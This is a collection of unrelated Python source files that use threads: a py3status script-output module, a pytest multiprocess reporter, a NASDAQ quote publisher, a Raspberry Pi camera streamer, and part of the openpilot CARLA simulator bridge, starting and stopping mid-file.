with worker.measure_task_time():
self.apply(worker, elem, **kwargs)
class StageStatus:
"""
Object passed to various `on_done` callbacks. It contains information about the stage in case book keeping is needed.
"""
def __init__(self, namespace, lock):
self._namespace = namespace
self._lock = lock
@property
def done(self) -> bool:
"""
`bool` : `True` if all workers finished.
"""
with self._lock:
return self._namespace.active_workers == 0
@property
def active_workers(self):
"""
`int` : Number of active workers.
"""
with self._lock:
return self._namespace.active_workers
def __str__(self):
return (
f"StageStatus(done = {self.done}, active_workers = {self.active_workers})"
)
# ----------------------------------------------------------------
# create_daemon_workers
# ----------------------------------------------------------------
def start_workers(
target: tp.Callable,
n_workers: int = 1,
args: tp.Tuple[tp.Any, ...] = tuple(),
kwargs: tp.Optional[tp.Dict[tp.Any, tp.Any]] = None,
use_threads: bool = True,
) -> tp.List[threading.Thread]:
if kwargs is None:
kwargs = {}
workers = []
for _ in range(n_workers):
t = threading.Thread(target=target, args=args, kwargs=kwargs)
t.daemon = True
t.start()
workers.append(t)
return workers
|
async_script.py
|
# -*- coding: utf-8 -*-
"""
Display output of a given script, updating the display when new lines
come in.
Always displays the last line of output from a given script, set by
`script_path`. If a line contains only a color (/^#[0-F]{6}$/), it is
used as such (set force_nocolor to disable).
The script may have parameters.
Configuration parameters:
force_nocolor: if true, won't check if a line contains color
(default False)
format: see placeholders below (default '{output}')
script_path: script you want to show output of (compulsory)
(default None)
strip_output: shall we strip leading and trailing spaces from output
(default False)
Format placeholders:
{output} output of script given by "script_path"
i3status.conf example:
```
external_script {
format = "{output}"
script_path = "ping 127.0.0.1"
}
```
@author frimdo ztracenastopa@centrum.cz, girst
SAMPLE OUTPUT
{'full_text': 'script output'}
example
{'full_text': '[193957.380605] wlp3s0: authenticated'}
"""
import re
import shlex
from subprocess import Popen, PIPE
from threading import Thread
class Py3status:
"""
"""
# available configuration parameters
force_nocolor = False
format = "{output}"
script_path = None
strip_output = False
def post_config_hook(self):
# class variables:
self.command_thread = Thread()
self.command_output = None
self.command_color = None
self.command_error = None # cannot throw self.py3.error from thread
if not self.script_path:
self.py3.error("script_path is mandatory")
def async_script(self):
response = {}
response["cached_until"] = self.py3.CACHE_FOREVER
if self.command_error is not None:
self.py3.log(self.command_error, level=self.py3.LOG_ERROR)
self.py3.error(self.command_error, timeout=self.py3.CACHE_FOREVER)
if not self.command_thread.is_alive():
self.command_thread = Thread(target=self._command_start)
self.command_thread.daemon = True
self.command_thread.start()
if self.command_color is not None:
response["color"] = self.command_color
response["full_text"] = self.py3.safe_format(
self.format, {"output": self.command_output}
)
return response
def _command_start(self):
try:
command = Popen(shlex.split(self.script_path), stdout=PIPE)
while True:
if command.poll() is not None: # script has exited/died; restart it
command = Popen(shlex.split(self.script_path), stdout=PIPE)
output = command.stdout.readline().decode().strip()
if re.search(r"^#[0-9a-fA-F]{6}$", output) and not self.force_nocolor:
self.command_color = output
else:
if output != self.command_output:
self.command_output = output
self.py3.update()
except Exception as e:
self.command_error = str(e)
self.py3.update()
if __name__ == "__main__":
"""
Run module in test mode.
"""
from py3status.module_test import module_test
module_test(Py3status, config={"script_path": "ping 127.0.0.1"})
|
mproc.py
|
import os
import time
import multiprocessing
import concurrent.futures
import py
from _pytest.junitxml import LogXML
from _pytest.terminal import TerminalReporter
from _pytest.junitxml import Junit
from _pytest.junitxml import _NodeReporter
from _pytest.junitxml import bin_xml_escape
from _pytest.junitxml import mangle_test_address
from .base import BaseMode
class MultiProcessMode(BaseMode):
NAME = 'mproc'
# Manager for the shared variables being used by in multiprocess mode
MANAGER = multiprocessing.Manager()
# to override the variable self.stats from LogXML
XMLSTATS = MANAGER.dict()
XMLSTATS['error'] = 0
XMLSTATS['passed'] = 0
XMLSTATS['failure'] = 0
XMLSTATS['skipped'] = 0
# ensures that XMLSTATS is not being modified simultaneously
XMLLOCK = multiprocessing.Lock()
XMLREPORTER = MANAGER.dict()
# XMLREPORTER_ORDERED = MANAGER.list()
NODELOCK = multiprocessing.Lock()
NODEREPORTS = MANAGER.list()
# to keep track of the log for TerminalReporter
DICTIONARY = MANAGER.dict()
# to override the variable self.stats from TerminalReporter
STATS = MANAGER.dict()
# ensures that STATS is not being modified simultaneously
LOCK = multiprocessing.Lock()
''' Multiprocess is not compatible with Windows !!! '''
def run_items(self, items, session, workers=None):
'''Using ThreadPoolExecutor as managers to control the lifecycle of processes.
Each thread will spawn a process and terminates when the process joins.
'''
def run_task_in_proc(item, index):
proc = multiprocessing.Process(target=self._run_next_item, args=(session, item, index))
proc.start()
proc.join()
with concurrent.futures.ThreadPoolExecutor(max_workers=workers) as executor:
for index, item in enumerate(items):
executor.submit(run_task_in_proc, item, index)
def set_reporter(self, config):
standard_reporter = config.pluginmanager.getplugin('terminalreporter')
concurrent_reporter = ConcurrentTerminalReporter(standard_reporter)
config.pluginmanager.unregister(standard_reporter)
config.pluginmanager.register(concurrent_reporter, 'terminalreporter')
if config.option.xmlpath is not None:
xmlpath = config.option.xmlpath
config.pluginmanager.unregister(config._xml)
config._xml = ConcurrentLogXML(xmlpath, config.option.junitprefix, config.getini("junit_suite_name"))
config.pluginmanager.register(config._xml)
class ConcurrentNodeReporter(_NodeReporter):
'''to provide Node Reporting for multiprocess mode'''
def __init__(self, nodeid, xml):
self.id = nodeid
self.xml = xml
self.add_stats = self.xml.add_stats
self.duration = 0
self.properties = []
self.nodes = []
self.testcase = None
self.attrs = {}
def to_xml(self): # overriden
testcase = Junit.testcase(time=self.duration, **self.attrs)
testcase.append(self.make_properties_node())
for node in self.nodes:
testcase.append(node)
return str(testcase.unicode(indent=0))
def record_testreport(self, testreport):
assert not self.testcase
names = mangle_test_address(testreport.nodeid)
classnames = names[:-1]
if self.xml.prefix:
classnames.insert(0, self.xml.prefix)
attrs = {
"classname": ".".join(classnames),
"name": bin_xml_escape(names[-1]),
"file": testreport.location[0],
}
if testreport.location[1] is not None:
attrs["line"] = testreport.location[1]
if hasattr(testreport, "url"):
attrs["url"] = testreport.url
self.attrs = attrs
def finalize(self):
data = self.to_xml() # .unicode(indent=0)
self.__dict__.clear()
self.to_xml = lambda: py.xml.raw(data)
MultiProcessMode.NODEREPORTS.append(data)
class ConcurrentLogXML(LogXML):
'''to provide XML reporting for multiprocess mode'''
def __init__(self, logfile, prefix, suite_name="pytest"):
logfile = logfile
logfile = os.path.expanduser(os.path.expandvars(logfile))
self.logfile = os.path.normpath(os.path.abspath(logfile))
self.prefix = prefix
self.suite_name = suite_name
self.stats = MultiProcessMode.XMLSTATS
self.node_reporters = {} # XMLREPORTER # nodeid -> _NodeReporter
self.node_reporters_ordered = []
self.global_properties = []
# List of reports that failed on call but teardown is pending.
self.open_reports = []
self.cnt_double_fail_tests = 0
def pytest_sessionfinish(self):
dirname = os.path.dirname(os.path.abspath(self.logfile))
if not os.path.isdir(dirname):
os.makedirs(dirname)
logfile = open(self.logfile, 'w', encoding='utf-8')
suite_stop_time = time.time()
suite_time_delta = suite_stop_time - self.suite_start_time
numtests = (self.stats['passed'] + self.stats['failure'] + self.stats['skipped'] + self.stats['error'] - self.cnt_double_fail_tests)
# print("NODE REPORTS: " + str(NODEREPORTS))
logfile.write('<?xml version="1.0" encoding="utf-8"?>')
logfile.write(Junit.testsuite(
self._get_global_properties_node(),
[self.concurrent_log_to_xml(x) for x in MultiProcessMode.NODEREPORTS],
name=self.suite_name,
errors=self.stats['error'],
failures=self.stats['failure'],
skips=self.stats['skipped'],
tests=numtests,
time="%.3f" % suite_time_delta, ).unicode(indent=0))
logfile.close()
def add_stats(self, key):
MultiProcessMode.XMLLOCK.acquire()
if key in self.stats:
self.stats[key] += 1
MultiProcessMode.XMLLOCK.release()
def node_reporter(self, report):
nodeid = getattr(report, 'nodeid', report)
# local hack to handle xdist report order
slavenode = getattr(report, 'node', None)
key = nodeid, slavenode
# NODELOCK.acquire()
if key in self.node_reporters:
# TODO: breasks for --dist=each
return self.node_reporters[key]
reporter = ConcurrentNodeReporter(nodeid, self)
self.node_reporters[key] = reporter
# NODEREPORTS.append(reporter.to_xml())
return reporter
def pytest_terminal_summary(self, terminalreporter):
terminalreporter.write_sep("-",
"generated xml file: %s" % (self.logfile))
def concurrent_log_to_xml(self, log):
return py.xml.raw(log)
class ConcurrentTerminalReporter(TerminalReporter):
'''to provide terminal reporting for multiprocess mode'''
def __init__(self, reporter):
TerminalReporter.__init__(self, reporter.config)
self._tw = reporter._tw
self.stats = MultiProcessMode.STATS
def add_stats(self, key):
if key in self.stats:
self.stats[key] += 1
def pytest_runtest_logreport(self, report):
rep = report
res = self.config.hook.pytest_report_teststatus(report=rep)
cat, letter, word = res
self.append_list(self.stats, cat, rep)
if report.when == 'call':
MultiProcessMode.DICTIONARY[report.nodeid] = report
self._tests_ran = True
if not letter and not word:
# probably passed setup/teardown
return
if self.verbosity <= 0:
if not hasattr(rep, 'node') and self.showfspath:
self.write_fspath_result(rep.nodeid, letter)
else:
self._tw.write(letter)
else:
if isinstance(word, tuple):
word, markup = word
else:
if rep.passed:
markup = {'green': True}
elif rep.failed:
markup = {'red': True}
elif rep.skipped:
markup = {'yellow': True}
line = self._locationline(rep.nodeid, *rep.location)
if not hasattr(rep, 'node'):
self.write_ensure_prefix(line, word, **markup)
# self._tw.write(word, **markup)
else:
self.ensure_newline()
if hasattr(rep, 'node'):
self._tw.write("[%s] " % rep.node.gateway.id)
self._tw.write(word, **markup)
self._tw.write(" " + line)
self.currentfspath = -2
def append_list(self, stats, cat, rep):
MultiProcessMode.LOCK.acquire()
cat_string = str(cat)
if stats.get(cat_string) is None:
stats[cat_string] = MultiProcessMode.MANAGER.list()
mylist = stats.get(cat_string)
mylist.append(rep)
stats[cat] = mylist
MultiProcessMode.LOCK.release()
|
nasdaq.py
|
#!/usr/bin/python
# $Id: nasdaq.py,v 1.2 2003/04/29 06:44:17 ifindkarma Exp $
import KNCONFIG
import time, random, urllib
from mx import DateTime
# Include local libraries:
sys.path = [ "../" ] + sys.path
from libkn import kn
from pprint import pprint
from threading import Thread
NASDAQ_MAXRQUESTS=10
NASDAQ_URL='http://quotes.nasdaq.com/quote.dll?page=custom&mode=stock'
NASDAQ_MINSWEEPTIME=5
NASDAQ_MINSWEEPTIME_NODELTA=300
KN_NASDAQ_TOPIC='/what/nasdaq2'
#expireString='+%d'%(NASDAQ_MINSWEEPTIME*5)
expireString='infinity'
quoteElements=['symbol','fullname','date','time','bid','ask','prev_close','high',
'low','last','unknown1','unknown2','change','volume']
numericQuoteElements=[4,5,7,8,9,9,9,9,9,12,13] #repeat the ones you want simulated most often
tickers={}
transmittedData={}
currentData={}
#didTransmit=0
gotDataException=0
sentSimulatedData=0
totalTransmitted=0
tickersByTens_last=None
tickersByTens=['']
tickersCount=0
gettingData=0
alwaysSimulate=1
knr=kn(host=KNCONFIG.PUBSUBSERVER_HOSTNAME,port=KNCONFIG.PUBSUBSERVER_PORT,traceOnly=KNCONFIG.PUBSUBSERVER_TRACEONLY)
#==========================================================================================
# Gets called for each new kn_subtopics event for the nasdaq topic
#==========================================================================================
def newTickerCallback(ev):
"""for each new ticker add it to the dictionary, but also
add it in groups of NASDAQ_MAXRQUESTS to tickersByTen"""
global tickers,tickersByTens_last,tickersByTens,tickersCount
global gettingData
ticker=ev.kn_payload.lower()
if ticker[:3]=='kn_':
return
if(ev.kn_payload!=ticker):
knr.subscribe(kn_from=KN_NASDAQ_TOPIC+'/'+ticker,
kn_to=KN_NASDAQ_TOPIC+'/'+ev.kn_payload)
if tickers.has_key(ticker):
return
tickers[ticker]=None
if (tickersCount%NASDAQ_MAXRQUESTS)==0:
if tickersCount and not gettingData:
getTickerData(tickersByTens_last)
tickersByTens_last=''
tickersByTens_last+= ('&symbol='+ticker)
tickersCount+=1
tickersByTens[len(tickersByTens)-1]=tickersByTens_last
print 'Registered ticker: '+ticker
# if (tickersCount%10)==1:
# tickersByTens.append(tickersByTens_last)
#==========================================================================================
# Gets 10 tickers at a time
#==========================================================================================
def getAllTickerData():
global gettingData
gettingData=1
if not tickersCount:
return
for groupOfTen in tickersByTens:
getTickerData(groupOfTen)
gettingData=0
#print 'finished getAllTickerData'
def getTickerData(groupOfTen,num=10):
global tickers,tickersByTens_last,tickersByTens,tickersCount
global currentData
if num>10:
raise
st=urllib.urlopen(NASDAQ_URL+groupOfTen)
for i in range(num):
s=st.readline()
if not s:break
#s should be in the form
#IBM|INTERNATIONAL BUSINESS MA|08/29/2001|16:00:00|0|0||104.95|105.90|103.82|104.13|16:00:00|-0.82|4840300||
dat=s.split('|')
if len(dat)<14:
break
dat=[s.split('*')[0] for s in dat]
ev=[(quoteElements[i],
dat[i])
for i in range(min(len(dat),14))]
ev.append(('kn_payload',dat[9]))
ev.append(('kn_to',KN_NASDAQ_TOPIC+'/'+dat[0].lower()))
ev.append(('kn_expires',expireString))
ev.append(('kn_id','0'))
currentData[dat[0]]=ev
st.close()
#==========================================================================================
# Sends events for any changed values
#==========================================================================================
def sendAllChangedTickerData():
global tickers,tickersByTens_last,tickersByTens,tickersCount
global currentData,transmittedData,totalTransmitted
#global didTransmit
if not tickersCount:
return
dat=[]
for ticker,current in currentData.items():
#if transmittedData.has_key(ticker):
# if transmittedData[ticker]==current:
# continue
if len(dat)>KNCONFIG.PUBSUBSERVER_MAXBATCHSIZE:
knr.publish(d=dat)
dat=[]
current[17]=('kn_id','%s_%d'%(ticker,time.time()))
dat.append(current)
transmittedData[ticker]=current
#didTransmit=1
totalTransmitted+=1
if len(dat)>0:
knr.publish(d=dat)
print 'finished sendAllChangedTickerData (totalTransmitted=%d)'%(totalTransmitted)
def sendSimulatedData():
global tickers,tickersByTens_last,tickersByTens,tickersCount
global currentData,transmittedData,totalTransmitted
#global didTransmit
keys=tickers.keys()
dat=[]
for ticker in keys:
if len(dat)>KNCONFIG.PUBSUBSERVER_MAXBATCHSIZE:
knr.publish(d=dat)
dat=[]
if random.randrange(50)>25:
try:
current=currentData[ticker]
except:
current=[('symbol',ticker),
('fullname','FULLNAME'),
('date','1/1/2001'),
('time','10:00:00'),
('bid','40'),
('ask','40'),
('prev_close','39'),
('high','41'),
('low','39'),
('last','40'),
('unknown1',''),
('unknown2',''),
('change','1'),
('volume','10000'),
('kn_payload','40'),
('kn_to',KN_NASDAQ_TOPIC+'/'+ticker.lower()),
('kn_expires',expireString),
('kn_id','0')]
currentData[ticker]=current
x=numericQuoteElements[random.randrange(len(numericQuoteElements))]
y=current[x][1].strip()
try:
if(len(y)<0):
continue
y=float(y)
if(x==13):
y=int(y)
y+=random.randrange(int(float(y)/10))
else:
y+=(y/30)-random.random()*(y/15)
if y!=13 and y<0:y=-y
if y!=13 and y==0:y=random.randrange(40)
except:
y=None
if not y is None:
current[x]=(current[x][0],str(y))
if x==9:
current[14]=('kn_payload',str(y))
current[17]=('kn_id','%s_%d'%(ticker,time.time()))
dat.append(current)
transmittedData[ticker]=current
totalTransmitted+=1
if len(dat)>KNCONFIG.PUBSUBSERVER_MAXBATCHSIZE:
knr.publish(d=dat)
dat=[]
if len(dat)>0:
knr.publish(d=dat)
print 'finished sendSimulatedData'
#==========================================================================================
# Threads
#==========================================================================================
def thread_getDataFunction():
#global didTransmit
global tickersCount,gotDataException
print 'thead_getDataFunction started'
lastTickersCount=0
while 1:
lastTime=time.time()
sleeptime=0
while 1:
try:
getAllTickerData()
gotDataException=0
break
except:
gotDataException+=1
sleeptime+=5
if sleeptime>20:
sleeptime=20
time.sleep(sleeptime)
print 'Exception opening URL in getData, retrying...'
while (time.time()-lastTime)<NASDAQ_MINSWEEPTIME_NODELTA:
x=max(min(NASDAQ_MINSWEEPTIME_NODELTA-time.time()+lastTime,NASDAQ_MINSWEEPTIME),1)
print 'getData sleeping for %d'%x
time.sleep(x)
#if didTransmit:
# didTransmit=0
# break
if tickersCount!=lastTickersCount:
break
x=(time.time()-lastTime)/NASDAQ_MINSWEEPTIME
if x==3:
print 'getData long sleep'
lastTickersCount=tickersCount
def thread_sendDataFunction():
global gotDataException,sentSimulatedData
print 'thead_sendDataFunction started'
while 1:
lastTime=time.time()
lt=time.localtime()
# NASDAQ open?
x=lt[3]*100+lt[4]
if DateTime.today().day_of_week>=5 or x<930 or x>1600 or gotDataException>3 or alwaysSimulate:
sleepTime=NASDAQ_MINSWEEPTIME
sendSimulatedData()
else:
sleepTime=NASDAQ_MINSWEEPTIME/2
sendAllChangedTickerData()
if (time.time()-lastTime)<sleepTime:
time.sleep(max(sleepTime-time.time()+lastTime,1))
#---------------------------------------- START
try:
knr.start()
time.sleep(2)
while 1:
m=knr.subscribe(kn_from=KN_NASDAQ_TOPIC+'/kn_subtopics',cb=newTickerCallback,options={'do_max_age':'infinity'})
if m is None:
print 'Retrying subscription'
else:
print m
break
#knr.publish(d=[('kn_to','/what/foo'),('kn_payload','hello')])
getDataThread=None
sendDataThread=None
lastCount=0
x=0
while knr.connected():
if not getDataThread or not getDataThread.isAlive():
print '(Re)starting getDataThread...'
getDataThread=Thread(target=thread_getDataFunction)
getDataThread.setDaemon(1)
getDataThread.start()
if not sendDataThread or not sendDataThread.isAlive():
print '(Re)starting sendDataThread...'
sendDataThread=Thread(target=thread_sendDataFunction)
sendDataThread.setDaemon(1)
sendDataThread.start()
x+=1
if x>5:
print 'Tickers=%d NumEvents=%d'%(tickersCount,totalTransmitted-lastCount)
lastCount=totalTransmitted
x=0
time.sleep(10)
finally:
knr.stop()
# End of nasdaq.py
|
AutCamera.py
|
import cv2
import numpy as np
import struct
import base64
import socket
import threading
import time
import subprocess
class Camera:
def __init__(self, connect_camera = False, host = '', port = 8089, rotation = None, capture_interval = 1):
"""
A camera object which is used to capture single images from a camera or start a live stream. It uses OpenCV under the hood.
@param connect_camera: If True, a socket connection is opened to the address and sport specified in the constructor
@param host: Defines the name of the host for camera strean. Default is localhost
@param port: Defines the port the camera is using for sending live images. Default to 8089
@param rotation: Defines if camera images should be rotated. Default is none, use -1 for 180 degree rotation
"""
self.__frame = None
self.host = host
self.port = port
self.__rotation = rotation
self.__nosignal = True
self.__proc = threading.Thread(target=self.__listen_socket)
self.__stop_sending = False
self.__capture_interval = capture_interval
# Load Rasperry Pi Cam kernel module bcm2835-v4l2
try:
subprocess.check_call("sudo modprobe bcm2835-v4l2", shell=True)
except Exception as e:
print("Warning: Couldn't load bcm2835-v4l2 kernel module")
self.__cam = cv2.VideoCapture(0)
if(connect_camera):
threading.Thread(target=self.__frame_updater).start()
def get_frame(self):
"""
Returns the current camera frame as byte object
"""
return self.__frame
def read(self):
"""
Returns the frame of the OpenCV VideoCapture buffer
"""
ret, frame = self.__cam.read()
if(self.__rotation != None):
frame = cv2.flip(frame, self.__rotation)
return ret, frame
def __frame_updater(self):
clientsocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
clientsocket.connect((self.host, self.port))
except Exception as e:
print("Could not connect to remote machine: "+str(e))
self.__nosignal = True
return
data = b""
self.__nosignal = False
payload_size = struct.calcsize("<L")
while True:
try:
while len(data) < payload_size:
data += clientsocket.recv(4096)
frame_size = struct.unpack("<L", data[:payload_size])[0]
data = data[payload_size:]
while len(data) < frame_size:
data += clientsocket.recv(16384)
frame_data = data[:frame_size]
data = data[frame_size:]
img = base64.b64decode(frame_data)
npimg = np.fromstring(img, dtype=np.uint8)
frame = cv2.imdecode(npimg, 1)
#cv2.imwrite("img.jpg", frame)
ret, jpeg = cv2.imencode('.jpg', frame)
self.__frame = jpeg.tobytes()
except (socket.error,socket.timeout) as e:
# The timeout got reached or the client disconnected. Clean up the mess.
print("Cleaning up: ",e)
try:
clientsocket.close()
except socket.error:
pass
self.__nosignal = True
break
def start(self):
"""
Starts a live streaming camera session. Should be called on the device which wants to broadcast
"""
self.__proc.start()
def stop(self):
"""
Stops the camera live stream, closes the socket
"""
self.__stop_sending = True
def __listen_socket(self):
serversocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
serversocket.bind((self.host, self.port))
serversocket.listen(10)
print('Camera socket now listening on ' + self.host + ":" + str(self.port))
conn, addr = serversocket.accept()
print("New client connection")
last_timestamp = time.time()
while not self.__stop_sending:
ret, frame = self.read()
current_time = time.time()
if(current_time - last_timestamp > self.__capture_interval):
last_timestamp = current_time
frame = cv2.resize(frame,(200, 150))
encoded, buffer = cv2.imencode('.jpg', frame)
b_frame = base64.b64encode(buffer)
b_size = len(b_frame)
# print("Frame size = ", b_size)
try:
conn.sendall(struct.pack("<L", b_size) + b_frame)
except socket.error as e:
print("Socket Error: "+str(e))
self.__stop_sending = True
conn.close()
serversocket.close()
|
bridge.py
|
#!/usr/bin/env python3
import argparse
import math
import os
import signal
import threading
import time
from multiprocessing import Process, Queue
from typing import Any
import carla # pylint: disable=import-error
import numpy as np
import pyopencl as cl
import pyopencl.array as cl_array
import cereal.messaging as messaging
from cereal import log
from cereal.visionipc.visionipc_pyx import VisionIpcServer, VisionStreamType # pylint: disable=no-name-in-module, import-error
from common.basedir import BASEDIR
from common.numpy_fast import clip
from common.params import Params
from common.realtime import DT_DMON, Ratekeeper
from selfdrive.car.honda.values import CruiseButtons
from selfdrive.test.helpers import set_params_enabled
from tools.sim.lib.can import can_function
W, H = 1928, 1208
REPEAT_COUNTER = 5
PRINT_DECIMATION = 100
STEER_RATIO = 15.
pm = messaging.PubMaster(['roadCameraState', 'wideRoadCameraState', 'sensorEvents', 'can', "gpsLocationExternal"])
sm = messaging.SubMaster(['carControl', 'controlsState'])
def parse_args(add_args=None):
parser = argparse.ArgumentParser(description='Bridge between CARLA and openpilot.')
parser.add_argument('--joystick', action='store_true')
parser.add_argument('--high_quality', action='store_true')
parser.add_argument('--town', type=str, default='Town04_Opt')
parser.add_argument('--spawn_point', dest='num_selected_spawn_point', type=int, default=16)
return parser.parse_args(add_args)
class VehicleState:
def __init__(self):
self.speed = 0
self.angle = 0
self.bearing_deg = 0.0
self.vel = carla.Vector3D()
self.cruise_button = 0
self.is_engaged = False
self.ignition = True
def steer_rate_limit(old, new):
# Rate limiting to 0.5 degrees per step
limit = 0.5
if new > old + limit:
return old + limit
elif new < old - limit:
return old - limit
else:
return new
class Camerad:
def __init__(self):
self.frame_road_id = 0
self.frame_wide_id = 0
self.vipc_server = VisionIpcServer("camerad")
# TODO: remove RGB buffers once the last RGB vipc subscriber is removed
self.vipc_server.create_buffers(VisionStreamType.VISION_STREAM_RGB_ROAD, 4, True, W, H)
self.vipc_server.create_buffers(VisionStreamType.VISION_STREAM_ROAD, 5, False, W, H)
self.vipc_server.create_buffers(VisionStreamType.VISION_STREAM_RGB_WIDE_ROAD, 4, True, W, H)
self.vipc_server.create_buffers(VisionStreamType.VISION_STREAM_WIDE_ROAD, 5, False, W, H)
self.vipc_server.start_listener()
# set up for pyopencl rgb to yuv conversion
self.ctx = cl.create_some_context()
self.queue = cl.CommandQueue(self.ctx)
cl_arg = f" -DHEIGHT={H} -DWIDTH={W} -DRGB_STRIDE={W * 3} -DUV_WIDTH={W // 2} -DUV_HEIGHT={H // 2} -DRGB_SIZE={W * H} -DCL_DEBUG "
# TODO: move rgb_to_yuv.cl to local dir once the frame stream camera is removed
kernel_fn = os.path.join(BASEDIR, "selfdrive", "camerad", "transforms", "rgb_to_yuv.cl")
with open(kernel_fn) as f:
prg = cl.Program(self.ctx, f.read()).build(cl_arg)
self.krnl = prg.rgb_to_yuv
self.Wdiv4 = W // 4 if (W % 4 == 0) else (W + (4 - W % 4)) // 4
self.Hdiv4 = H // 4 if (H % 4 == 0) else (H + (4 - H % 4)) // 4
def cam_callback_road(self, image):
self._cam_callback(image, self.frame_road_id, 'roadCameraState',
VisionStreamType.VISION_STREAM_RGB_ROAD, VisionStreamType.VISION_STREAM_ROAD)
self.frame_road_id += 1
def cam_callback_wide_road(self, image):
self._cam_callback(image, self.frame_wide_id, 'wideRoadCameraState',
VisionStreamType.VISION_STREAM_RGB_WIDE_ROAD, VisionStreamType.VISION_STREAM_WIDE_ROAD)
self.frame_wide_id += 1
def _cam_callback(self, image, frame_id, pub_type, rgb_type, yuv_type):
img = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
img = np.reshape(img, (H, W, 4))
img = img[:, :, [0, 1, 2]].copy()
# convert RGB frame to YUV
rgb = np.reshape(img, (H, W * 3))
rgb_cl = cl_array.to_device(self.queue, rgb)
yuv_cl = cl_array.empty_like(rgb_cl)
self.krnl(self.queue, (np.int32(self.Wdiv4), np.int32(self.Hdiv4)), None, rgb_cl.data, yuv_cl.data).wait()
yuv = np.resize(yuv_cl.get(), np.int32(rgb.size / 2))
eof = int(frame_id * 0.05 * 1e9)
# TODO: remove RGB send once the last RGB vipc subscriber is removed
self.vipc_server.send(rgb_type, img.tobytes(), frame_id, eof, eof)
self.vipc_server.send(yuv_type, yuv.data.tobytes(), frame_id, eof, eof)
dat = messaging.new_message(pub_type)
msg = {
"frameId": image.frame,
"transform": [1.0, 0.0, 0.0,
0.0, 1.0, 0.0,
0.0, 0.0, 1.0]
}
setattr(dat, pub_type, msg)
pm.send(pub_type, dat)
def imu_callback(imu, vehicle_state):
vehicle_state.bearing_deg = math.degrees(imu.compass)
dat = messaging.new_message('sensorEvents', 2)
dat.sensorEvents[0].sensor = 4
dat.sensorEvents[0].type = 0x10
dat.sensorEvents[0].init('acceleration')
dat.sensorEvents[0].acceleration.v = [imu.accelerometer.x, imu.accelerometer.y, imu.accelerometer.z]
# copied these numbers from locationd
dat.sensorEvents[1].sensor = 5
dat.sensorEvents[1].type = 0x10
dat.sensorEvents[1].init('gyroUncalibrated')
dat.sensorEvents[1].gyroUncalibrated.v = [imu.gyroscope.x, imu.gyroscope.y, imu.gyroscope.z]
pm.send('sensorEvents', dat)
def panda_state_function(vs: VehicleState, exit_event: threading.Event):
pm = messaging.PubMaster(['pandaStates'])
while not exit_event.is_set():
dat = messaging.new_message('pandaStates', 1)
dat.valid = True
dat.pandaStates[0] = {
'ignitionLine': vs.ignition,
'pandaType': "blackPanda",
'controlsAllowed': True,
'safetyModel': 'hondaNidec'
}
pm.send('pandaStates', dat)
time.sleep(0.5)
def peripheral_state_function(exit_event: threading.Event):
pm = messaging.PubMaster(['peripheralState'])
while not exit_event.is_set():
dat = messaging.new_message('peripheralState')
dat.valid = True
# fake peripheral state data
dat.peripheralState = {
'pandaType': log.PandaState.PandaType.blackPanda,
'voltage': 12000,
'current': 5678,
'fanSpeedRpm': 1000
}
pm.send('peripheralState', dat)
time.sleep(0.5)
def gps_callback(gps, vehicle_state):
dat = messaging.new_message('gpsLocationExternal')
# transform vel from carla to NED
# north is -Y in CARLA
velNED = [
-vehicle_state.vel.y, # north/south component of NED is negative when moving south
vehicle_state.vel.x, # positive when moving east, which is x in carla
vehicle_state.vel.z,
]
dat.gpsLocationExternal = {
"timestamp": int(time.time() * 1000),
"flags": 1, # valid fix
"accuracy": 1.0,
"verticalAccuracy": 1.0,
"speedAccuracy": 0.1,
"bearingAccuracyDeg": 0.1,
"vNED": velNED,
"bearingDeg": vehicle_state.bearing_deg,
"latitude": gps.latitude,
"longitude": gps.longitude,
"altitude": gps.altitude,
"speed": vehicle_state.speed,
"source": log.GpsLocationData.SensorSource.ublox,
}
pm.send('gpsLocationExternal', dat)
def fake_driver_monitoring(exit_event: threading.Event):
pm = messaging.PubMaster(['driverState', 'driverMonitoringState'])
while not exit_event.is_set():
# dmonitoringmodeld output
dat = messaging.new_message('driverState')
dat.driverState.faceProb = 1.0
pm.send('driverState', dat)
# dmonitoringd output
dat = messaging.new_message('driverMonitoringState')
dat.driverMonitoringState = {
"faceDetected": True,
"isDistracted": False,
"awarenessStatus": 1.,
}
pm.send('driverMonitoringState', dat)
time.sleep(DT_DMON)
def can_function_runner(vs: VehicleState, exit_event: threading.Event):
i = 0
while not exit_event.is_set():
can_function(pm, vs.speed, vs.angle, i, vs.cruise_button, vs.is_engaged)
time.sleep(0.01)
i += 1
def connect_carla_client():
client = carla.Client("127.0.0.1", 2000)
client.set_timeout(5)
return client
class CarlaBridge:
def __init__(self, arguments):
set_params_enabled()
msg = messaging.new_message('liveCalibration')
msg.liveCalibration.validBlocks = 20
msg.liveCalibration.rpyCalib = [0.0, 0.0, 0.0]
Params().put("CalibrationParams", msg.to_bytes())
self._args = arguments
self._carla_objects = []
self._camerad = None
self._exit_event = threading.Event()
self._threads = []
self._keep_alive = True
self.started = False
signal.signal(signal.SIGTERM, self._on_shutdown)
self._exit = threading.Event()
def _on_shutdown(self, signal, frame):
self._keep_alive = False
def bridge_keep_alive(self, q: Queue, retries: int):
try:
while self._keep_alive:
try:
self._run(q)
break
except RuntimeError as e:
self.close()
if retries == 0:
raise
# Reset for another try
self._carla_objects = []
self._threads = []
self._exit_event = threading.Event()
retries -= 1
if retries <= -1:
print(f"Restarting bridge. Error: {e} ")
else:
print(f"Restarting bridge. Retries left {retries}. Error: {e} ")
finally:
# Clean up resources in the opposite order they were created.
self.close()
def _run(self, q: Queue):
client = connect_carla_client()
world = client.load_world(self._args.town)
settings = world.get_settings()
settings.synchronous_mode = True # Enables synchronous mode
settings.fixed_delta_seconds = 0.05
world.apply_settings(settings)
world.set_weather(carla.WeatherParameters.ClearSunset)
if not self._args.high_quality:
world.unload_map_layer(carla.MapLayer.Foliage)
world.unload_map_layer(carla.MapLayer.Buildings)
world.unload_map_layer(carla.MapLayer.ParkedVehicles)
world.unload_map_layer(carla.MapLayer.Props)
world.unload_map_layer(carla.MapLayer.StreetLights)
world.unload_map_layer(carla.MapLayer.Particles)
blueprint_library = world.get_blueprint_library()
world_map = world.get_map()
vehicle_bp = blueprint_library.filter('vehicle.tesla.*')[1]
spawn_points = world_map.get_spawn_points()
assert len(spawn_points) > self._args.num_selected_spawn_point, f'''No spawn point {self._args.num_selected_spawn_point}, try a value between 0 and
{len(spawn_points)} for this town.'''
